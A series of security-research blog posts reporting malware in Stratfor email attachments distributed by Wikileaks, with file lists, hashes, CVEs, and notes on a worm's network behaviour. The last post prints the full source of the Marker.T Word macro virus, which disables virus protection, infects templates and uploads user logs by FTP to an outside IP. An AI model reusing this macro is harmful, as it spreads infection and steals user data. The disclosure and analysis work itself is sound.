Saturday, April 15, 2017
The script includes a standard six-byte GIF header before the "<?php" establishing the opening of the PHP code, and the payload itself had a .gif file extension. It is pretty obvious either to a naked eye or a program that more than a very basic check that this .GIF is not an image. It is slightly more sophisticated than other attempts I have seen which simply rename a payload file, but not as sophisticated as payloads that are embedded within an actual image.
Developers could make attacks like these much more difficult by including more sophisticated file type checks with upload functionality. In the case of this GIF, performing a sanity check of the Logical Screen Descriptor block (must be two pair of two bytes, each 16 bit positive integers) in addition to the Header Block would have caught this as phony. Even more obviously, checking for common open tags for scripts would have caught this and similar garbage-ware (e.g. <?, <?php, etc).
Sunday, July 31, 2016
I plan on writing a post on how assumptions about user behavior are frequently inaccurate, and how assumptions based on the behavior of Wikileaks researchers analyzing email dumps based on the typical behavior of normal email users is particularly prone to failure, but for now I'll just leave this here:
Has anybody's InfoSec experts advised abt wisdom of opening WikiLeaks sound files? Are we all just downloading Russian malware like morons?— David Fahrenthold (@Fahrenthold) July 28, 2016
Friday, July 29, 2016
If anyone is interested I might post my complete conversation with Rogers, where I talk in more detail about how the unlabeled distribution of email attachments from compromised email servers poses unique dangers to journalists, activists and researchers whose job involves reviewing each of those attachments.
This article represents the most attention paid by US media to the significant dangers posed to Wikileaks users by the insecure review methodology in place prior to distribution of these files. Although major newspapers in Europe and the UK published my findings on malware within the GI Files, no major news outlets in the United States published those findings.
Tuesday, September 15, 2015
As I discussed in my series of posts explaining how the Stratfor email dump hosted by Wikileaks contains malicious software, I first came across a series of infected files when I downloaded and reviewed a torrent file hosted on the Wikileaks subsite "wlstorage.net". A number of factors at the time lead me to believe that "wlstorage.net" was not a mirror of Wikileaks hosted by a third party, but was in fact run by the Wikileaks organization directly: notably, that both wlstorage.net and wikileaks.org resolved to the same set of IP addresses, both sites shared the same SSL certificate, and wlstorage.net was linked to throughout wikileaks.org.
Today it was brought to my attention that wlstorage.net has been taken offline, and I verified that the DNS entry for wlstorage.net has been kiboshed. wlstorage.net uses the Wikileaks nameservers (ns1.wikileaks.org & ns2.wikileaks.org), so this change would have been performed by a trusted member of the Wikileaks technical team. I am not aware of any announcements from Wikileaks stating the reason for the removal of wlstorage.net from DNS. Whatever the reason for the change, this update has not removed the infected files from distribution.
As of this writing (9/15/2015), all of the infected files remain available for direct, individual download through a series of dozens of curated links directly from the wikileaks.org website. I have also received reports that those attempting to download the infected torrent file using a Bittorrent client are unable to find a complete peer to seed the torrent. If anyone wishes to review these files for research purposes you are welcome to contact me and I can seed temporarily. For obvious reasons I am not interested in seeding the torrent on anything like an ongoing basis, and I encourage researchers and journalists to review the infected files directly on the wikileaks.org as a first step. I have compiled a list of URLs containing infected files and posted it to PasteBin; I also have a post explaining that infected files are not restricted to the torrent file.
Tuesday, August 4, 2015
- Yahoo's ad network and Microsoft Azure's web hosting service were abused to circulate an enormous flood of malicious software. Malwarebytes is being credited with the discovery - which is a little amusing because Malwarebytes has for had their own issues with security for many years. h/t Washington Post
- Planned Parenthood and a variety of other related organizations were brought offline by a sustained series of DDoS attacks. In what may or may not have been the work of the same group of individuals, someone has claimed they have hacked Planned Parenthood and retrieved an employee list database of some kind or another.
AFAIK, this sort of thing is new to the abortion debate in the US - honestly the only political debates where this sort of thing typically comes to the fore are "internet" issues surrounding surveillance, cryptocurrency and the like. The "Culture Wars" are fought in city halls, lobbyist offices and in the bank transfers of PACs rather than through data center Meet Me rooms.
Personally I am interested in finding out if the DDoS was outsourced or if there is, in fact, a pro-life botnet. Will online hooliganism become a part of the political conversation? h/t Rolling Stone
- The Electronic Frontier Foundation and Muck Rock have partnered to file a butt-load of FOIA requests in order to provide the public with a better understanding of how biometrics is being used by law enforcement and federal government agencies to provide street level, warrantless surveillance of ordinary Americans. h/t Muck Rock
- In a strange move, DHS Deputy Secretary Alejandro Mayorkas said that some provisions of the Cybersecurity Information Sharing Act (CISA) “could sweep away important privacy protections” and that proposed legislation “raises privacy and civil liberties concerns.” Apparently Mayorkas found nothing ironic about this statement, while the news outlets who retyped the message for public consumption found it completely normal. h/t Russia Today
Friday, July 31, 2015
Cryptome is a long time advocate of government transparency, and had already been publishing leaked documents on their website for close to a decade when Wikileaks was first created. Here is Cryptome describes their mission:
Cryptome welcomes documents for publication that are prohibited by governments worldwide, in particular material on freedom of expression, privacy, cryptology, dual-use technologies, national security, intelligence, and secret governance -- open, secret and classified documents -- but not limited to those. Documents are removed from this site only by order served directly by a US court having jurisdiction. No court order has ever been served; any order served will be published here -- or elsewhere if gagged by order. Bluffs will be published if comical but otherwise ignored.Cryptome has had its ups and downs over the years. Certainly, publication there is not verification of my findings. However, I greatly appreciate the publication and hope that it contributes to my ongoing goals of getting some extra pairs of eyes reviewing these malicious files as well as other file leaks, and to warn journalists and activists of the dangers of improperly handling these malware infected files.
At least two major news papers will be running features that I know of; I'll post those as they are released.
Wednesday, July 15, 2015
Malware discovered in the Stratfor email file dump provided by Wikileaks is not limited to torrents - curated content on the Wikileaks website also infected
Since that time I have made numerous attempts to contact Wikileaks so that they could inform their users that the torrent contained malicious software. After receiving no response, I began to publicize my findings by posting them on Hacker News/Ycombinator and similar sites like Slashdot and Reddit. My post on Hacker News quickly reached the front page and attracted the attention of the former leader of Lulzsec, Hector Monsegur (aka sabu), who confirmed the validity and importance of my findings in a series of public tweets.
In my original post, I speculated that:
"The data is indeed massive, over 5.5 million emails. Perhaps so massive that ~ two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (from the time they were received by WL sometime around 2012)."The publication of the Global Intelligence Files by Wikileaks began on February 27th, 2012. The entire email server spool was not dumped onto the internet at one time. The publication was curated, with only a small percentage of the emails being published initially. Over time, more emails were published. This progression can be easily viewed on the directory hosting the torrents for the Stratfor leaks:
The torrent file that contains malware is the only file in the directory with a nomenclature that does not include a full date (it was also created using bzip instead of 7zip); the filename is simply gifiles-2014.tar.bz2.torrent. Initially, this meant I was not sure of the exact date that the torrent was released.
I knew that the relatively small number of curated content was available on the Wikileaks.org website. Today I was able to confirm that malicious files and their related attachments are also being hosted on Wikileaks.org, as individual uncompressed files. I have composed a list of these files, their URLs and basic file information on pastebin: (I have embedded the pastebin below as an iframe; if you don't trust iframes in your browser you can click through the prior link instead)
NOTE: Wikileaks has multiple URLs servicing multiple directory structures, all that eventually seem to point to the same place. So for example, https://wikileaks.org/gifiles/docs/35/3547802_plans-coordinates-and-executes-.html and https://search.wikileaks.org/gifiles/emailid/3547802 both point to the same content (and include the same malware attachment available for download).
While I am not alone in my concern over the circulation of an infected torrent of the nature I described in my first post, posting individual infected files directly to *.wikileaks.org domain and several subdomains in a curated manner is likely more dangerous - users are more likely to consider the following a link to content that has in some fashion been secured:
An expectation that a video posted on Fox News will not contain an embedded script is not a wild expectation. Similarly a New York Times article that includes a photo in an article is usually believed to not contain spyware. This is a basic expectation of service on every website, not just news outlets. Primary sources are important. User transparency is also important.
The attached file above, "18714_Research_and_R.xls", appears to be a normal Excel spreadsheet but in fact contains an embedded OLE. It is the exact size in bytes as the same attachment I discovered within the torrent that started this series of posts:
Of course there is no need to take my word for it. The file contains an embedded OLE and PE file - the hallmarks of malware designed to exploit vulnerabilities in the Microsoft Office Suit. Of note are the following:
An API-Hashing signature is stored at 0x3ad1 There are two decryption loops at 0x00003932 and 0x00003934 The embedded OLE signature is stored at 0x7a00 A XOR encrypted MZ/PE signature is stored at 0x5a00 and the encryption key is 0x97 A ROL encrypted OLE signature is stored at 0x7a00 and the encryption key is 0x08OfficeMalScanner can duplicate these results. When I ran OfficeMalScanner against "18714_Research_and_R.xls" using the brute debug scan mode, the scan produced a malicious index of 62. Several antiviruses will detect this file. Depending on which you use, it might declare the file to use CVE-2009-3129 or CVE-2009-0557 (it probably relies on both exploits at different points). I have created bin files from memory dumps of the embedded OLE and PE (as I have for the roughly dozen similar malware payloads); I am happy to provide those to interested researchers. Here are the relevant signatures:
MD5 2746a014bdd9f7bf252262b82cf63e11 SHA1 cf525700b9e1027c4628fa9689bf68777291c60d SHA256 4f9550c3f3abbfac4153b4467666e7a46e29ab974627ffd7feed7a711d55ffcd
As I mentioned earlier in this post, Google malware service in Chrome detects only three of the so far 18 infected attachments. The two that are detected are the two oldest malware by the date sent and are both compressed executables (one a .COM and the other two are .EXE) rather than embedded within documents. Here is what downloading one of these off of the Wikileaks website looks like as of now:
Both of the old nasty .EXE's appear to have been sent from firstname.lastname@example.org, which as far as I can tell, was/is the email address of Meredith Friedman, the VP of Communications for Stratfor:
Email-ID 3451016 Date 2003-11-04 15:32:57 From email@example.com To firstname.lastname@example.org, email@example.com Subject: FW: Re: our private photos bkarngkr Email-ID 3491917 Date 2004-01-27 01:03:10 From firstname.lastname@example.org To email@example.com Subject: FW: HI
Would anyone care to bet me a dollar that in late 2003 her email password was "mfriedman", her birthday, "12345" or some combination thereof?
The source of the .COM file is as follows:
Email-ID 3547802 Date 2001-11-10 05:16:54 From firstname.lastname@example.org To undisclosed-recipients: Subject: Plans, coordinates, and executes
Finally for today, please do not make the mistake of assuming that all of the exploits are from this time period and thus are of no important to modern computer users. I cannot make this clear enough: these two files are the *oldest* of the malicious files I have discovered.
To return to the first post in our series on the Wikileaks / Strafor email malware click here.
If you are looking for the second post, where we look briefly inside one of the executables click here.
This is the link for my conversation with Hector Monsegur AKA sabu of Lulzsec on the Wikileaks / Strafor email malware.
Monday, July 13, 2015
Hector Monsegur (formerly sabu of Lulzsec) has responded to my analysis of the Wikileaks Global Intelligence Files
The torrent file was one of the latest versions of what Wikileaks has named the "Global Intelligence Files" - a large cache of documents obtained from the email spool of a government contractor known as Stratfor.
Since my discovery I have made several attempts to contact Wikileaks:
@wikileaks sorry to contact here but no other means Ive identified sec issues with most recent torrent here: https://t.co/oeBLtLgDeb— Josh Wieder (@JoshWieder) May 3, 2015
In addition to Twitter I have attempted to email just about every address I could find on their site (none of them work), as well as attempting to use the chat function mentioned on the Wikileaks Twitter feed. I have been unable to receive a response. Users must be notified when a file transfer contains malware; particularly given the sensitive nature of the documents in question.@wikileaks I have some very basic info here http://t.co/cvjY4xWuIr and here: http://t.co/74Xbmxjmy7 can provide more as needed— Josh Wieder (@JoshWieder) May 3, 2015
This afternoon I received a series of comments on Twitter from former Lulzsec member Hector Monsegur. In his comments, Monsegur denies instigating the attack that lead to the release of the Stratfor files while confirming the danger of the malware contained in the files I identified:
@JoshWieder Nice read but I didnt instigate the attack. A lot of those big dumps at the time (Italian Cybercrime hack) had malware within.— Hector X. Monsegur (@hxmonsegur) July 13, 2015
@JoshWieder @wikileaks You are correct. Nosediving into these kind of dumps without an understanding of risk will lead to compromise.— Hector X. Monsegur (@hxmonsegur) July 13, 2015
@JoshWieder An attackers assumption would be that media and LEAs will click around files looking for info. What better way to get new vics— Hector X. Monsegur (@hxmonsegur) July 13, 2015
|Hector Monsegur during an interview with CBS|
@hxmonsegur Thanks for reply. I tend to agree w/ your assessment. It looks like these guys ran a mailserver w/out clamav or similar— Josh Wieder (@JoshWieder) July 13, 2015
@hxmonsegur So all of the typical spammer garbage got delivered & stored. At this point my main frustration is that the files are being— Josh Wieder (@JoshWieder) July 13, 2015
As of this writing (3PM @ 7-13-2015) Wikileaks continues to provide a torrent file with an identical timestamp, filename and byte size as the one I analyzed without any warning message notifying users of the danger of handling the files.@hxmonsegur circulated by @wikileaks w/out warning users of malware within despite multiple attempts to contact them— Josh Wieder (@JoshWieder) July 13, 2015
To return to the first post in our series on the Wikileaks / Strafor email malware click here.
If you are looking for the second post, where we look briefly inside one of the executables click here.
And here is a link to the next post in my Wikileaks / Strafor email malware series, where I demonstrate how the malware is available file by file on the Wikileaks.Org website, and not just within the torrent as I originally suspected.
Tuesday, March 31, 2015
I am slowly going through the malicious files in order to better understand what they are attempting to do. The work primarily involves extracting Visual Basic macros and OBE structures from documents, disassembling executables that are thus scraped from the payload document. Even for files using well documented exploits, as many of these files are, this is slow-going and tedious work that I invite readers experienced in security research to contact me about to offer assistance.
One such executable retrieved from the Stratfor files is gifiles-2014\gifiles\attach\151\151784_Command.com. As with the files reviewed yesterday, this was retrieved from the gifiles-2014.tar.gz.torrent file downloaded from wlstorage.net, which resides on the same servers as wikileaks.org. I have disassembled this executable using Heaven Tools' PE Explorer and Hex-Rays IDA. Accordingly I have determined that the file contains a variant of the Magistr worm. However, this version seems to have a number of unique features that I have not seen in the literature concerning Magistr (NOTE there are numerous versions of this worm, and this one has likely been seen before by someone).
The program makes use of the following DLL's to call its various functions:
KERNEL32.dll USER32.dll COMCTL32.dll WININET.dll cmpbk32.dll cmutil.dll
The program adds an entry for itself in the Microsoft Connection Manager Phone Books and uses that entry to establish both FTP and HTTP connections. I am still working on where the connections head to.
|The program loads the MSCM Phone Book|
|Connection Manager is used to establish an FTP connection and transfer files|
|HTTP connections are established as well|
PBUPDATE.PBD PBUPDATE.EXE PBUPDATE.INF PBUPDATE.VER
|PBUPDATE.EXE is associated with iPassConnect|
I am more than happy to share more comprehensive information concerning my research, so feel free to email me if you would like to help out.
I have also contacted Wikileaks (to the best of my ability) to warn them of the dangerous files being distributed on wlstorage.net. For a number of reasons they are not the easiest people to get ahold of, particularly in relation to technical issues, and I do not know anyone directly affiliated with the group. If someone reading this post does have a more direct means of communication with Wikileaks, please provide them with this information ASAP!
Monday, March 30, 2015
Hector Monsegur, formerly sabu of Lulzsec, has offered his point of view on this post. Get his opinion by reading my third post on the topic.
In my fourth post on this topic, I explain how malware is not limited to the Stratfor leak torrent - curated links throughout the Wikileaks.Org website allow users to download individual infected files.
This series of posts is beginning to receive coverage from several newspapers around the world. German speakers should check out the story in Neue Zürcher Zeitung / New Zurich Times. For English speakers, I recommend The Register from the UK for an excellent summary of these findings.
Beginning in February 27, 2012, the controversial news organization Wikileaks has been publishing a large and growing trove of emails from the private intelligence firm Strategic Forecasting, Inc (more widely known as Stratfor). The leak publication began with 200 emails, with Wikileaks progressively publishing more and more emails through the final publication date of July 18, 2014, at which time a single file containing over 5 million emails was published.
The source of the content was Jeremy Hammond, working in concert with Hector Xavier Monsegur as part of the group AntiSec. Hammond is currently in prison for the hack. Monsegur remains free; he was an FBI informant at the time of the hack and the release of the files. While the hack is attributed to Hammond, reliable sources are indicating that it was Monsegur who instigated the attack while he worked for the FBI. (NOTE: Hector X. Monsegnur has personally responded to this blog post and has denied this characterization of what happened. My only information on the history of the documents was obtained through media sources and court documents, which are often not reliable. I have not attempted to contact Jeremy Hammond. I only included this very brief foreward in an attempt to explain the history of the documents; which is still contested.)
It has been widely reported that Monsegur used an FBI-provided laptop and often worked full-time from an FBI office New York during the nine month period that the #antisec and #lulzsec released their widely distributed hacks, including the Stratfor job. To confuse matters further, court documents include reference to a third party, someone named Hyrriiya, who provided information critical to the Stratfor intrusion.
The content of the emails, though of obvious political and social significance, is not relevant to our post here. Newspapers around the world have spent a significant amount of time reporting on those leaks. However, no one appears to have noticed that a significant number of the files included in the leak contain malicious files that are designed to, among other things, retrieve detailed information about the computers which have downloaded them and send them to a variety of remote systems.
My research at this time is still in progress, however given the wide circulation of this data & the apparent lack of notification of the danger in these files has convinced me to publish what little I have found immediately.
I ought to be clear from the outset: I have no information linking Wikileaks, Asssange, Hammond, Monsegur, the FBI or anyone else directly with these malicious files. That very well may change quickly as research progresses, but at no point should this post be considered finger pointing. The purpose of this post is not to assign responsibility but to ensure that the journalists and activists downloading these files or who have already downloaded these files understand the consequences and take proper precautions. If I can encourage security researchers to take a look at these files it would be a bonus.
The files in question are not being distributed directly through the wikileaks.org domain, but through a secondary domain wlstorage.net. While the domains are separate, the wlstorage.net is linked directly from the Wikileak Global Intelligence Files web page (at https://wikileaks.org/gifiles), the two share the same SSL certificate as well as the same IP addresses. This would seem to (but doesn't entirely) rule out the notion that traffic is being diverted from Wikileaks to a fake server to fool users to download the malicious files.
# host wikileaks.org wikileaks.org has address 188.8.131.52 wikileaks.org has address 184.108.40.206 wikileaks.org has address 220.127.116.11 wikileaks.org has address 18.104.22.168 wikileaks.org has address 22.214.171.124 wikileaks.org has address 126.96.36.199 wikileaks.org mail is handled by 1 mx.wikileaks.org. # host wlstorage.net wlstorage.net has address 188.8.131.52 wlstorage.net has address 184.108.40.206 wlstorage.net has address 220.127.116.11 wlstorage.net has address 18.104.22.168 wlstorage.net has address 22.214.171.124 wlstorage.net has address 126.96.36.199
|The Wikileaks.Org Global Intelligence Files web page|
|The link to wlstorage.net from Wikileaks|
|The Global Intelligence Files torrent files on wlstorage.net|
issuer= /C=FR/O=GANDI SAS/CN=Gandi Standard SSL CA subject= /OU=Domain Control Validated/OU=Gandi Standard Wildcard SSL/CN=*.wikileaks.org notBefore=Oct 14 00:00:00 2013 GMT notAfter=Oct 14 23:59:59 2015 GMT 00b5f826 SHA1 Fingerprint=10:B3:D9:66:7F:BC:57:B5:C1:CF:98:5B:16:E3:EC:61:A4:C3:ED:32 # echo |\ > openssl s_client -connect wikileaks.org:443 2>&1 |\ > sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' -----BEGIN CERTIFICATE----- MIIE6DCCA9CgAwIBAgIQKAc9xHmKh6q3z95GsMA9IjANBgkqhkiG9w0BAQUFADBB MQswCQYDVQQGEwJGUjESMBAGA1UEChMJR0FOREkgU0FTMR4wHAYDVQQDExVHYW5k aSBTdGFuZGFyZCBTU0wgQ0EwHhcNMTMxMDE0MDAwMDAwWhcNMTUxMDE0MjM1OTU5 WjBjMSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxJDAiBgNVBAsT G0dhbmRpIFN0YW5kYXJkIFdpbGRjYXJkIFNTTDEYMBYGA1UEAxQPKi53aWtpbGVh a3Mub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwpQwc3GxL/BS gnQyIoYth18lqHwl70IYbPrM1rJnQ/kgnTOBE2ztEI8DGWAxoxZaeV7XckCTproL u6lVFQlNQWW8FxhqFwSpC6NkVUoYDcSKnxwrj9UUy15BpGwmMCUOcnIe0U1YUfGo hzJAzoqWEmXvaYnC8iIrv2Yd+jT511/Q38hjcQWJUOxQl8XNPbuQmD1WHYhH252j tEiTo9W72fhQa9Gdzxy2J4223n3iK4vQZx+RSwBF7JpbhUpCWXKqOnf6oboDtwsS TDzVpdiaMUh2PhdqJR0E+dkX3h0WT1ShLiKkb3zc0D3pRoCFRLEZXMQeDCM0aLco NHxIe4lGQwIDAQABo4IBuDCCAbQwHwYDVR0jBBgwFoAUtqj/oqgv0KbNS7Fo8+dQ EDGneSEwHQYDVR0OBBYEFGs9iHIkjSj3V1CgThX0Fs+sNogDMA4GA1UdDwEB/wQE AwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD AjBgBgNVHSAEWTBXMEsGCysGAQQBsjEBAgIaMDwwOgYIKwYBBQUHAgEWLmh0dHA6 Ly93d3cuZ2FuZGkubmV0L2NvbnRyYWN0cy9mci9zc2wvY3BzL3BkZi8wCAYGZ4EM AQIBMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuZ2FuZGkubmV0L0dhbmRp U3RhbmRhcmRTU0xDQS5jcmwwagYIKwYBBQUHAQEEXjBcMDcGCCsGAQUFBzAChito dHRwOi8vY3J0LmdhbmRpLm5ldC9HYW5kaVN0YW5kYXJkU1NMQ0EuY3J0MCEGCCsG AQUFBzABhhVodHRwOi8vb2NzcC5nYW5kaS5uZXQwKQYDVR0RBCIwIIIPKi53aWtp bGVha3Mub3Jngg13aWtpbGVha3Mub3JnMA0GCSqGSIb3DQEBBQUAA4IBAQAXlibh e0R/kZ6eBGahIhYiy4fAWylbB4/G+k9OKFuz55e43aw5ADB2BGQtY3FSzghL4chn uYBZNBHxsOeDnOisu1hxDxSLjG5oofJFzmNryOxrI2f9aC0sbGAauxM5+Wsj6kw9 ghylh6Tp6Q5X01jXlD91LD5M74NwUDrTd0Sdl1rB7A8LjEvdVTnlmzxAJDK7VQHX fa+RXiPBqCgTaRTgBh6s7BRssMAX0P80cdTu8EkiNUODh6hmXnqKhuHLcdu9CELc tz3okx9jRNmFP1Wp0Z7WupYUNcdMPSWEMLBjm6vYT54jFtIVeNK0sChmWxiADFBr ElIzcmpt7JexUF8K -----END CERTIFICATE----- echo |\ > openssl s_client -connect wlstorage.net:443 2>&1 |\ > sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' -----BEGIN CERTIFICATE----- MIIE6DCCA9CgAwIBAgIQKAc9xHmKh6q3z95GsMA9IjANBgkqhkiG9w0BAQUFADBB MQswCQYDVQQGEwJGUjESMBAGA1UEChMJR0FOREkgU0FTMR4wHAYDVQQDExVHYW5k aSBTdGFuZGFyZCBTU0wgQ0EwHhcNMTMxMDE0MDAwMDAwWhcNMTUxMDE0MjM1OTU5 WjBjMSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxJDAiBgNVBAsT G0dhbmRpIFN0YW5kYXJkIFdpbGRjYXJkIFNTTDEYMBYGA1UEAxQPKi53aWtpbGVh a3Mub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwpQwc3GxL/BS gnQyIoYth18lqHwl70IYbPrM1rJnQ/kgnTOBE2ztEI8DGWAxoxZaeV7XckCTproL u6lVFQlNQWW8FxhqFwSpC6NkVUoYDcSKnxwrj9UUy15BpGwmMCUOcnIe0U1YUfGo hzJAzoqWEmXvaYnC8iIrv2Yd+jT511/Q38hjcQWJUOxQl8XNPbuQmD1WHYhH252j tEiTo9W72fhQa9Gdzxy2J4223n3iK4vQZx+RSwBF7JpbhUpCWXKqOnf6oboDtwsS TDzVpdiaMUh2PhdqJR0E+dkX3h0WT1ShLiKkb3zc0D3pRoCFRLEZXMQeDCM0aLco NHxIe4lGQwIDAQABo4IBuDCCAbQwHwYDVR0jBBgwFoAUtqj/oqgv0KbNS7Fo8+dQ EDGneSEwHQYDVR0OBBYEFGs9iHIkjSj3V1CgThX0Fs+sNogDMA4GA1UdDwEB/wQE AwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD AjBgBgNVHSAEWTBXMEsGCysGAQQBsjEBAgIaMDwwOgYIKwYBBQUHAgEWLmh0dHA6 Ly93d3cuZ2FuZGkubmV0L2NvbnRyYWN0cy9mci9zc2wvY3BzL3BkZi8wCAYGZ4EM AQIBMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuZ2FuZGkubmV0L0dhbmRp U3RhbmRhcmRTU0xDQS5jcmwwagYIKwYBBQUHAQEEXjBcMDcGCCsGAQUFBzAChito dHRwOi8vY3J0LmdhbmRpLm5ldC9HYW5kaVN0YW5kYXJkU1NMQ0EuY3J0MCEGCCsG AQUFBzABhhVodHRwOi8vb2NzcC5nYW5kaS5uZXQwKQYDVR0RBCIwIIIPKi53aWtp bGVha3Mub3Jngg13aWtpbGVha3Mub3JnMA0GCSqGSIb3DQEBBQUAA4IBAQAXlibh e0R/kZ6eBGahIhYiy4fAWylbB4/G+k9OKFuz55e43aw5ADB2BGQtY3FSzghL4chn uYBZNBHxsOeDnOisu1hxDxSLjG5oofJFzmNryOxrI2f9aC0sbGAauxM5+Wsj6kw9 ghylh6Tp6Q5X01jXlD91LD5M74NwUDrTd0Sdl1rB7A8LjEvdVTnlmzxAJDK7VQHX fa+RXiPBqCgTaRTgBh6s7BRssMAX0P80cdTu8EkiNUODh6hmXnqKhuHLcdu9CELc tz3okx9jRNmFP1Wp0Z7WupYUNcdMPSWEMLBjm6vYT54jFtIVeNK0sChmWxiADFBr ElIzcmpt7JexUF8K -----END CERTIFICATE-----
I have reviewed the last two file dumps listed in the wlstorage.net torrent list: gifiles-20121104151320.7z & gifiles-2014.tar.bz2. I was unable to identify any malware in 20121104151320.7z - which is notable for a number of reasons. Each of these files is massive - gifiles-20121104151320.7z is close to 3GB while compressed. However, gifiles-2014.tar.bz2 is 9x the size of gifiles-20121104151320.7z. The two files also use a different encryption scheme. 7zip is a Windows compression program, and 7zip was used to make every gifiles torrent dump except for gifiles-2014.tar.bz2 - which uses Tar and BZip, used commonly in Windows & Linux. Its reasonable to assume that gifiles-2014.tar.bz2 was created on a different computer than all of the other distributions.
I've identified the following exploits being used:
MARKER.T CVE-2006-2492 CVE-2009-0557 CVE-2011-0611 CVE-2010-3333 HEAPSPRAY Mydoom Magistr Pdfjsc.BP Wordjmp.gen Mimail
The software vulnerable to these exploits is (version omitted while research is in progress):
Adobe Acrobat Adobe Flash Player ActiveX Microsoft Office Microsoft Office for Mac Open XML File Format Converter
These exploits are contained in the following files:
gifiles-2014\gifiles\attach\6\6566_The Split Betw.doc gifiles-2014\gifiles\attach\19\19701_MASY - Q MASY HUMINT.doc gifiles-2014\gifiles\attach\19\19719_List of Addresses - Advance Copies.doc gifiles-2014\gifiles\attach\152\152977_Happy vacation.pdf gifiles-2014\gifiles\attach\18\18714_Research_and_R.xls gifiles-2014\gifiles\attach\117\117687_Lithium.doc gifiles-2014\gifiles\attach\117\117870_Hybrid write-up2.doc gifiles-2014\gifiles\attach\117\117793_Hybrid write-up.doc gifiles-2014\gifiles\attach\47\47247_US Congress re.doc gifiles-2014\gifiles\attach\47\47329_US Congress re.doc gifiles-2014\gifiles\attach\52\52004_IRAN_STRAIT_PART.pdf gifiles-2014\gifiles\attach\151\151784_Command.com gifiles-2014\gifiles\attach\151\151098_text.zip->(Zip) gifiles-2014\gifiles\attach\151\151098_text.zip->text.exe gifiles-2014\gifiles\attach\119\119443_Russia Data Requests.doc gifiles-2014\gifiles\attach\142\142345_photos.zip->(Zip) gifiles-2014\gifiles\attach\142\142345_photos.zip->photos.jpg.exe gifiles-2014\gifiles\attach\146\146924_message.zip->(Zip) gifiles-2014\gifiles\attach\146\146924_message.zip->message.exe gifiles-2014\gifiles\attach\17\17102_Draft scenarios for Libya_0416.pdf
These attachments are just phishing nonsense and dont contain malicious software but if you scan this dump with an antivirus they may cause a positive:
I have been working on extracting the payloads from the .DOC files first before moving on to the .PDFs and attempting to decompile the few executables. I have been able to confirm that the exploits and payloads in 117687_Lithium.doc, 117870_Hybrid write-up2.doc and 17793_Hybrid write-up.doc are identical. Here are the relevant signatures for the files:
Each of these three documents contains the following Visual Basic macro, a classic Marker.T that is well over 10 years old:
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() On Error Resume Next Const Marker = "<- this is a marker!" 'Declare Variables Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean Dim ad, nt As Object Dim OurCode, UserAddress, LogData, LogFile As String 'Initialize Variables Set ad = ActiveDocument.VBProject.VBComponents.Item(1) Set nt = NormalTemplate.VBProject.VBComponents.Item(1) DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000) NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000) 'Switch the VirusProtection OFF Options.VirusProtection = False If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then If DocumentInfected = True Then LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines) ElseIf NormalTemplateInfected = True Then LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines) End If LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->")) For i = 1 To 4 LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1) Next i LogFile = "C:\hsf" & LogFile & ".sys" Open LogFile For Output As #1 Print #1, LogData Close #1 Open "c:\netldx.vxd" For Output As #1 Print #1, "o 188.8.131.52" Print #1, "user anonymous" Print #1, "pass itsme@" Print #1, "cd incoming" Print #1, "ascii" Print #1, "put " & LogFile Print #1, "quit" Close #1 Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True End If 'Make sure that some conditions are true before we continue infecting anything If (DocumentInfected = True Xor NormalTemplateInfected = True) And _ (ActiveDocument.SaveFormat = wdFormatDocument Or _ ActiveDocument.SaveFormat = wdFormatTemplate) Then 'Infect the NormalTemplate If DocumentInfected = True Then SaveNormalTemplate = NormalTemplate.Saved OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines) 'Write a log file of this NormalTemplate infection For i = 1 To Len(Application.UserAddress) If Mid(Application.UserAddress, i, 1) <> Chr(13) Then If Mid(Application.UserAddress, i, 1) <> Chr(10) Then UserAddress = UserAddress & Mid(Application.UserAddress, i, 1) End If Else UserAddress = UserAddress & Chr(13) & "' " End If Next i OurCode = OurCode & Chr(13) & _ "' " & Format(Time, "hh:mm:ss AMPM - ") & _ Format(Date, "dddd, d mmm yyyy") & Chr(13) & _ "' " & Application.UserName & Chr(13) & _ "' " & UserAddress & Chr(13) nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines nt.CodeModule.AddFromString OurCode If SaveNormalTemplate = True Then NormalTemplate.Save End If 'Infect the ActiveDocument If NormalTemplateInfected = True And _ (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _ ActiveDocument.Saved = False) Then SaveDocument = ActiveDocument.Saved OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines) ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines ad.CodeModule.AddFromString OurCode If SaveDocument = True Then ActiveDocument.Save End If End If End Sub
